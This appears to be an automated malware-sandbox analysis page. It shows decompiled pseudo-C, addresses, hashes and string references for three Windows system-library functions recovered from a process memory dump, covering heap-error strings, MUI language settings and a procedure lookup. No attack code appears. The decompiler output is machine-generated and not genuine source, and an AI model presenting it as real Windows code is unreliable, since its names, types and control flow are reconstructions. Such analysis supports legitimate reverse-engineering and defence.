String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 672c8b1cf75749e3f739d79e143472a7e65d11cf9311144bfaf7968589730acc
Instruction ID: 387206be0fa3bc0a790ebff6fa0b60daf7df9d24ca095a6493c50e3303db7147
Opcode Fuzzy Hash: 672c8b1cf75749e3f739d79e143472a7e65d11cf9311144bfaf7968589730acc
Instruction Fuzzy Hash: 61612636661580DFD711EB48EA96F2073E4EB04B2272988FAFC0D6F261D6618C44CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00AA3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00AA3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00AA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00AA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00AA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00AA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00AA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00AB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00ADF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00AE1370(_t276, 0xa74e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00ADBB40(0,  &_v68, _t170);
									if(L00AA43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00ADBB40(_t257,  &_v68, _t243);
								if(L00AA43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00AE1370(_t278, 0xa74e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00AB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00ADF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00AE1370(_v16, 0xa74e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00ADBB40(_t262,  &_v68, _t244);
								if(L00AA43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00AE1370(_t282, 0xa74e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00ADBB40(_t262,  &_v68, _t201);
							if(L00AA43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00AB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00ADF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00AE1370(_t280, 0xa74e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00ADBB40(_t267,  &_v68, _t245);
							if(L00AA43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00AE1370(_t284, 0xa74e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00ADBB40(_t267,  &_v68, _t224);
						if(L00AA43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00aa3d3c
0x00aa3d42
0x00aa3d44
0x00aa3d46
0x00aa3d49
0x00aa3d4c
0x00aa3d4f
0x00aa3d52
0x00aa3d55
0x00aa3d58
0x00aa3d5b
0x00aa3d5f
0x00aa3d61
0x00aa3d66
0x00af8213
0x00af8218
0x00aa4085
0x00aa4088
0x00aa408e
0x00aa4094
0x00aa409a
0x00aa40a0
0x00aa40a6
0x00aa40a9
0x00aa40af
0x00aa40b6
0x00aa40bd
0x00aa40bd
0x00aa3d83
0x00af821f
0x00af8229
0x00af8238
0x00af8238
0x00af823d
0x00af823d
0x00aa3da0
0x00aa3daf
0x00aa3db5
0x00aa3dba
0x00aa3dba
0x00aa3dd4
0x00aa3e94
0x00aa3eab
0x00aa3f6d
0x00aa3f84
0x00aa406b
0x00aa406b
0x00aa406e
0x00aa406e
0x00aa4070
0x00aa4074
0x00af8351
0x00af8351
0x00aa407a
0x00aa407f
0x00af835d
0x00af8370
0x00af8377
0x00af8379
0x00af837c
0x00af837c
0x00af835d
0x00000000
0x00aa407f
0x00aa3f8a
0x00aa3f8d
0x00aa3f90
0x00aa3f95
0x00af830d
0x00af830f
0x00aa3f9b
0x00aa3fac
0x00aa3fae
0x00aa3fb1
0x00aa3fb1
0x00aa3fb6
0x00af8317
0x00af831a
0x00000000
0x00aa3fbc
0x00aa3fc1
0x00aa3fc9
0x00aa3fd7
0x00aa3fda
0x00aa3fdd
0x00aa4021
0x00aa4021
0x00aa4029
0x00aa4030
0x00aa4044
0x00aa4046
0x00aa4046
0x00aa4044
0x00aa4049
0x00af8327
0x00af8334
0x00af8339
0x00af833c
0x00aa404f
0x00aa404f
0x00aa404f
0x00aa4051
0x00aa4056
0x00aa4063
0x00aa4063
0x00aa4068
0x00000000
0x00aa4068
0x00aa3fdf
0x00aa3fe2
0x00aa3fe4
0x00aa3fe7
0x00aa3fef
0x00aa4003
0x00aa4005
0x00aa4005
0x00aa400c
0x00aa4013
0x00aa4016
0x00aa4017
0x00aa401b
0x00aa401e
0x00000000
0x00aa401e
0x00aa3fb6
0x00aa3eb1
0x00aa3eb4
0x00aa3eb7
0x00aa3ebc
0x00af82a9
0x00af82ab
0x00aa3ec2
0x00aa3ed3
0x00aa3ed5
0x00aa3ed8
0x00aa3ed8
0x00aa3edd
0x00af82b3
0x00af82b6
0x00000000
0x00aa3ee3
0x00aa3ee8
0x00aa3eed
0x00aa3ef0
0x00aa3ef3
0x00aa3f02
0x00aa3f05
0x00aa3f08
0x00af82c0
0x00af82c3
0x00af82c5
0x00af82c8
0x00af82d0
0x00af82e4
0x00af82e6
0x00af82e6
0x00af82ed
0x00af82f4
0x00af82f7
0x00af82f8
0x00af82fc
0x00af82ff
0x00af82ff
0x00aa3f0e
0x00aa3f11
0x00aa3f16
0x00aa3f1d
0x00aa3f31
0x00af8307
0x00af8307
0x00aa3f31
0x00aa3f39
0x00aa3f48
0x00aa3f4d
0x00aa3f50
0x00aa3f50
0x00aa3f53
0x00aa3f58
0x00aa3f65
0x00aa3f65
0x00aa3f6a
0x00000000
0x00aa3f6a
0x00aa3edd
0x00aa3dda
0x00aa3ddd
0x00aa3de0
0x00aa3de5
0x00af8245
0x00aa3deb
0x00aa3df7
0x00aa3dfc
0x00aa3dfe
0x00aa3e01
0x00aa3e01
0x00aa3e06
0x00af824d
0x00af824f
0x00af8254
0x00000000
0x00aa3e0c
0x00aa3e11
0x00aa3e16
0x00aa3e19
0x00aa3e29
0x00aa3e2c
0x00aa3e2f
0x00af825c
0x00af825f
0x00af8261
0x00af8264
0x00af826c
0x00af8280
0x00af8282
0x00af8282
0x00af8289
0x00af8290
0x00af8293
0x00af8294
0x00af8298
0x00af829b
0x00af829b
0x00aa3e35
0x00aa3e38
0x00aa3e3d
0x00aa3e44
0x00aa3e58
0x00af82a3
0x00af82a3
0x00aa3e58
0x00aa3e60
0x00aa3e6f
0x00aa3e74
0x00aa3e77
0x00aa3e77
0x00aa3e7a
0x00aa3e7f
0x00aa3e8c
0x00aa3e8c
0x00aa3e91
0x00000000
0x00aa3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 00AA3DC0
Kernel-MUI-Language-SKU, xrefs: 00AA3F70
Kernel-MUI-Language-Disallowed, xrefs: 00AA3E97
Kernel-MUI-Number-Allowed, xrefs: 00AA3D8C
WindowsExcludedProcs, xrefs: 00AA3D6F

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 5cde25176d377eddbc106b68304dcf73c0a946b2d48343880dcecd185e059794
Instruction ID: 714a27e0609bf7936e90b48214f9a180650c734fb1ecceb6c33c0e6a04d8b7b1
Opcode Fuzzy Hash: 5cde25176d377eddbc106b68304dcf73c0a946b2d48343880dcecd185e059794
Instruction Fuzzy Hash: AEF14A72D00618EFCB11DF98CA80AEEBBB9FF49750F15406AF505AB251DB749E00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A9E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A9E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00A9F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00AD95D0();
						}
						if(_t78 != 0) {
							L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00ADFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00ADBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = L00AD9600();
					if(_t97 < 0) {
						goto L6;
					}
					E00ADBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00A9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00ADBB40(_t83, _t102 + 0x24, _t78);
								if(L00AA43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00ADBB40(_t84, _t102 + 0x24, _t94);
									if(L00AA43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00a9e620
0x00a9e628
0x00a9e62f
0x00a9e631
0x00a9e635
0x00a9e637
0x00a9e63e
0x00af5503
0x00af5503
0x00a9e64c
0x00a9e64c
0x00a9e651
0x00000000
0x00000000
0x00a9e661
0x00a9e665
0x00af542a
0x00a9e715
0x00a9e71a
0x00a9e71c
0x00a9e720
0x00a9e720
0x00a9e727
0x00a9e736
0x00a9e736
0x00a9e743
0x00a9e743
0x00a9e673
0x00a9e678
0x00a9e67d
0x00a9e682
0x00a9e685
0x00a9e692
0x00a9e69b
0x00a9e6a3
0x00a9e6ad
0x00a9e6b1
0x00a9e6b2
0x00a9e6bb
0x00a9e6bf
0x00a9e6c0
0x00a9e6c8
0x00a9e6cc
0x00a9e6d5
0x00a9e6d9
0x00000000
0x00000000
0x00a9e6e5
0x00a9e6ea
0x00a9e6f9
0x00a9e70b
0x00a9e70f
0x00af5439
0x00af545e
0x00af545e
0x00000000
0x00af545e
0x00af543b
0x00af543e
0x00af5440
0x00af5445
0x00af5472
0x00af5475
0x00af548d
0x00af5493
0x00af54a9
0x00000000
0x00000000
0x00af54ab
0x00af54b4
0x00af54bc
0x00af54c8
0x00af54de
0x00af54fb
0x00af54e0
0x00af54e6
0x00af54eb
0x00af54eb
0x00af54de
0x00000000
0x00af54bc
0x00af5477
0x00af547a
0x00af5480
0x00af5483
0x00af5486
0x00af548b
0x00000000
0x00000000
0x00000000
0x00af548b
0x00000000
0x00000000
0x00000000
0x00000000
0x00af5447
0x00af5447
0x00af5447
0x00af5447
0x00af544e
0x00000000
0x00000000
0x00af5450
0x00af5452
0x00af5455
0x00af545a
0x00000000
0x00000000
0x00000000
0x00af545c
0x00af546a
0x00af546d
0x00af546f
0x00000000
0x00af546f
0x00a9e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A9E68C
InstallLanguageFallback, xrefs: 00A9E6DB
@, xrefs: 00A9E6C0

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 8545d5e231a7c0ad192d1c4a945a6bac74275ea7345f9c3a5b62456f3720204c
Instruction ID: 25d8684655ea1d60bea892ef2532131a417e43411bad4607a595ba88aae30bfc
Opcode Fuzzy Hash: 8545d5e231a7c0ad192d1c4a945a6bac74275ea7345f9c3a5b62456f3720204c
Instruction Fuzzy Hash: E25180769087459BCB14DFA4C480ABBB3E9BF88715F05092EFA85D7241F734DD4487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAD5E0, Relevance: 2.9, Strings: 2, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00AAD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xb8d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = L00AA6600(0xb852d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xb87b9c; // 0x0
							_t281 = L00AB4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00ADF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xb87b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0xb87b8c; // 0x632a58
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00AB2280(_t200, 0xb884d8);
									_t277 =  *0xb885f4; // 0x632f48
									_t351 =  *0xb885f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x632ee0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									L00AAFFB0(_t287, _t353, 0xb884d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00AECC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = L00AA6600(0xb852d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00AA7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xb8b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00B1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xb88472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xb8b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xb8b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00AB2280(_t250, 0xb884d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00AD3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																L00AAFFB0(_t293, _t353, 0xb884d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	L00AD37F5(_t353, 0);
																}
																E00AD0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00AC9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00AC02D6(_t174);
																}
																L00AB77F0( *0xb87b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00ACC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00AAEC7F(_t353);
										L00AC19B8(_t287, 0, _t353, 0);
										_t200 = E00A9F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xb8b2f8 |  *0xb8b2fc) == 0 || ( *0xb8b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return L00ADB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xb8b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
